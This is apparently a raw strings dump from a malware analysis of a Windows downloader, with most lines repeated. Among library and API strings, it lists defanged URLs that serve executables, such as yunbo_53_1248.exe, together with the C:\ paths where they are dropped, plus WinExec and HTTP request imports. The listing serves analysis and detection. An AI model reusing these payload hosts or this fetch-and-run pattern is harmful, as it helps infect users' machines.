)%Y%C/j\
)%Y%C/j\
.vwuW
.vwuW
`.csh-[~
`.csh-[~
.nl!&q
.nl!&q
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
user32.dll
user32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
WinExec
WinExec
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpOpenRequestA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
J.text
J.text
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
PAD
PAD
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
WS2_32.dll
WS2_32.dll
(*.*)
(*.*)
1.0.0.0
1.0.0.0
(hXXp://VVV.eyuyan.com)
(hXXp://VVV.eyuyan.com)
%original file name%.exe_400_rwx_00401000_00123000:
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
hXXp://xiazai.lianmengqudao1.com:1227/down/u.php?d=yunbo_53_1248.exe
hXXp://xiazai.lianmengqudao1.com:1227/down/u.php?d=yunbo_53_1248.exe
C:\syunbo_53_1248.exe
C:\syunbo_53_1248.exe
hXXp://VVV.jiuhuabuy.com/kuplay/930/871248/
hXXp://VVV.jiuhuabuy.com/kuplay/930/871248/
C:\jufilo_930_871248.exe
C:\jufilo_930_871248.exe
#ÿf
#ÿf
H.Xli
H.Xli
\v.rFc
\v.rFc
!2.mf
!2.mf
;:t%s
;:t%s
Â`pI
Â`pI
f
f
)%Y%C/j\
)%Y%C/j\
.vwuW
.vwuW
`.csh-[~
`.csh-[~
.nl!&q
.nl!&q
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
user32.dll
user32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
WinExec
WinExec
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpOpenRequestA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
syunbo_53_1248.exe_1300:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
8%u*@Sj%
8%u*@Sj%
t.Gj:W
t.Gj:W
Whd%F
Whd%F
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
w$hT%F
w$hT%F
.PjRW
.PjRW
Internal error clearing splay node = %d
Internal error clearing splay node = %d
Internal error removing splay node = %d
Internal error removing splay node = %d
Could not resolve %s: %s
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
getaddrinfo() failed for %s:%d; %s
%s:%d
%s:%d
Hostname %s was found in DNS cache
Hostname %s was found in DNS cache
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
smtp
smtp
;type=%c
;type=%c
Send failure: %s
Send failure: %s
Write callback asked for PAUSE when not supported!
Write callback asked for PAUSE when not supported!
[%s %s %s]
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
Local port: %hu
Local port: %hu
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Trying %s...
Immediate connect fail for %s: %s
Immediate connect fail for %s: %s
%s:%s
%s:%s
%sAuthorization: Basic %s
%sAuthorization: Basic %s
The requested URL returned error: %d
The requested URL returned error: %d
%s auth using %s with user '%s'
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Modified-Since: %s
If-Unmodified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Last-Modified: %s
Referer: %s
Referer: %s
Accept-Encoding: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s
Host: %s%s%s:%hu
Host: %s%s%s:%hu
PTF://
PTF://
Range: bytes=%s
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
PTF://%s:%s@%s
%s HTTP/%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
%s%s=%s
Internal HTTP POST error!
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP POST request
Failed sending HTTP request
Failed sending HTTP request
operation aborted by callback
operation aborted by callback
Read callback asked for PAUSE when not supported!
Read callback asked for PAUSE when not supported!
seek callback returned error %d
seek callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
ioctl callback returned error %d
ioctl callback returned error %d
--:--:--
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
d:d:d
d:d:d
d:d
d:d
0123456789
0123456789
Unsupported protocol
Unsupported protocol
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
HTTP response code said error
FTP: command PORT failed
FTP: command PORT failed
FTP: command REST failed
FTP: command REST failed
Operation was aborted by an application callback
Operation was aborted by an application callback
A libcurl function was given a bad argument
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Invalid LDAP URL
Issuer check against peer certificate failed
Issuer check against peer certificate failed
Login denied
Login denied
TFTP: File Not Found
TFTP: File Not Found
TFTP: Access Violation
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: No such user
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Error in the SSH layer
Unable to parse FTP file list
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
SSL server certificate status verification FAILED
Protocol option is unsupported
Protocol option is unsupported
Protocol is unsupported
Protocol is unsupported
Socket is unsupported
Socket is unsupported
Operation not supported
Operation not supported
Address family not supported
Address family not supported
Protocol family not supported
Protocol family not supported
Winsock version not supported
Winsock version not supported
Unknown error %d (%#x)
Unknown error %d (%#x)
%d.%d.%d.%d
%d.%d.%d.%d
CLIENT libcurl 7.44.0-DEV
CLIENT libcurl 7.44.0-DEV
MATCH %s %s %s
MATCH %s %s %s
DEFINE %s %s
DEFINE %s %s
WSAStartup failed (%d)
WSAStartup failed (%d)
insufficient winsock version to support telnet
insufficient winsock version to support telnet
%s IAC %s
%s IAC %s
%s IAC %d
%s IAC %d
%s %s %s
%s %s %s
%s %s %d
%s %s %d
%s %d %d
%s %d %d
Sending data failed (%d)
Sending data failed (%d)
%s IAC SB
%s IAC SB
%s (unsupported)
%s (unsupported)
%d (unknown)
%d (unknown)
USER,%s
USER,%s
7[^= ]%*[ =]%5s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Syntax error in telnet option: %s
Unknown telnet option %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c%s%c%c
%c%c%c%c
%c%c%c%c
7[^,],7s
7[^,],7s
%c%s%c%s
%c%s%c%s
WS2_32.DLL
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
got option=(%s) value=(%s)
blksize is larger than max supported
blksize is larger than max supported
%s (%d)
%s (%d)
blksize is smaller than min supported
blksize is smaller than min supported
%s (%ld)
%s (%ld)
%s (%d) %s (%d)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
%s%c%s%c
tftp_send_first: internal error
tftp_send_first: internal error
Received last DATA packet block %d again.
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
tftp_rx: internal error
Received ACK for block %d, expecting %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
tftp_tx: internal error, event: %i
TFTP finished
TFTP finished
bind() failed; %s
bind() failed; %s
TFTP response timeout
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
LDAP remote: %s
There are more than %d entries
There are more than %d entries
LOGIN %s %s
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
AUTHENTICATE %s
No known authentication mechanisms supported!
No known authentication mechanisms supported!
LIST "%s" *
LIST "%s" *
SELECT %s
SELECT %s
FETCH %s BODY[%s]
FETCH %s BODY[%s]
FETCH %s BODY[%s]
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
APPEND %s (\Seen) {%I64d}
SEARCH %s
SEARCH %s
LOGINDISABLED
LOGINDISABLED
STARTTLS not supported.
STARTTLS not supported.
STARTTLS denied. %c
STARTTLS denied. %c
Access denied. %c
Access denied. %c
IMAPS not supported!
IMAPS not supported!
%cd
%cd
%s %s
%s %s
USER %s
USER %s
APOP %s %s
APOP %s %s
AUTH %s %s
AUTH %s %s
AUTH %s
AUTH %s
STLS not supported.
STLS not supported.
Authentication failed: %d
Authentication failed: %d
PASS %s
PASS %s
POP3S not supported!
POP3S not supported!
SMTP
SMTP
EHLO %s
EHLO %s
HELO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:%s
RCPT TO:
RCPT TO:
Got unexpected smtp-server response: %d
Got unexpected smtp-server response: %d
Remote access denied: %d
Remote access denied: %d
Command failed: %d
Command failed: %d
MAIL failed: %d
MAIL failed: %d
RCPT failed: %d
RCPT failed: %d
DATA failed: %d
DATA failed: %d
SMTPS not supported!
SMTPS not supported!
PORT
PORT
Preparing for accepting server on data port
Preparing for accepting server on data port
FTP response timeout
FTP response timeout
FTP response aborted due to select/poll error: %d
FTP response aborted due to select/poll error: %d
CWD %s
CWD %s
getsockname() failed: %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
%s |%d|%s|%hu|
Failure sending EPRT command: %s
Failure sending EPRT command: %s
,%d,%d
,%d,%d
Failure sending PORT command: %s
Failure sending PORT command: %s
Connect data stream passively
Connect data stream passively
PRET %s
PRET %s
PRET STOR %s
PRET STOR %s
PRET RETR %s
PRET RETR %s
REST %d
REST %d
SIZE %s
SIZE %s
%s%s%s
%s%s%s
MDTM %s
MDTM %s
APPE %s
APPE %s
STOR %s
STOR %s
%c%c%c%u%c
%c%c%c%u%c
Illegal port number in EPSV reply
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
Failed to do PORT
dddddd
dddddd
ddd d:d:d GMT
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
unsupported MDTM reply format
Got a d response code instead of the assumed 200
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
ftp server doesn't support SIZE
RETR %s
RETR %s
Failed FTP upload:
Failed FTP upload:
RETR response: d
RETR response: d
PBSZ %d
PBSZ %d
ACCT %s
ACCT %s
Access denied: d
Access denied: d
ACCT rejected by server: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
PROT %c
Entry path is '%s'
Entry path is '%s'
QUOT command failed with d
QUOT command failed with d
MKD %s
MKD %s
Failed to MKD dir: d
Failed to MKD dir: d
PRET command not accepted: d
PRET command not accepted: d
Remembering we are in dir "%s"
Remembering we are in dir "%s"
Failure sending ABOR command: %s
Failure sending ABOR command: %s
server did not report OK, got %d
server did not report OK, got %d
QUOT string not accepted: %s
QUOT string not accepted: %s
TYPE %c
TYPE %c
Connecting to %s (%s) port %d
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Failure sending QUIT command: %s
Uploading to a URL without a file name!
Uploading to a URL without a file name!
FTPS not supported!
FTPS not supported!
Couldn't open file %s
Couldn't open file %s
Can't open %s for writing
Can't open %s for writing
Can't get the size of %s
Can't get the size of %s
Refusing to issue an RTSP request [%s] without a session ID.
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport:
Transport: %s
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
Range: %s
%s %s RTSP/1.0
%s %s RTSP/1.0
Session: %s
Session: %s
%s%s%s%s%s%s
%s%s%s%s%s%s
curl
curl
%sAuthorization: Digest %s
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
%sAuthorization: NTLM %s
SOCKS4 communication to %s:%d
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s:%hu
%s%s%s:%hu
%s%s%s:%hu
Host: %s
Host: %s
CONNECT %s HTTP/%s
CONNECT %s HTTP/%s
%s%s%s%s
%s%s%s%s
HTTP/1.%d %d
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
Received HTTP code %d from proxy after CONNECT
.jpeg
.jpeg
.html
.html
; filename="%s"
; filename="%s"
%s; boundary=%s
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
Content-Type: %s
couldn't open file "%s"
couldn't open file "%s"
--%s--
--%s--
------------------------xx
------------------------xx
%c%c==
%c%c==
%c%c%c=
%c%c%c=
LOGIN
LOGIN
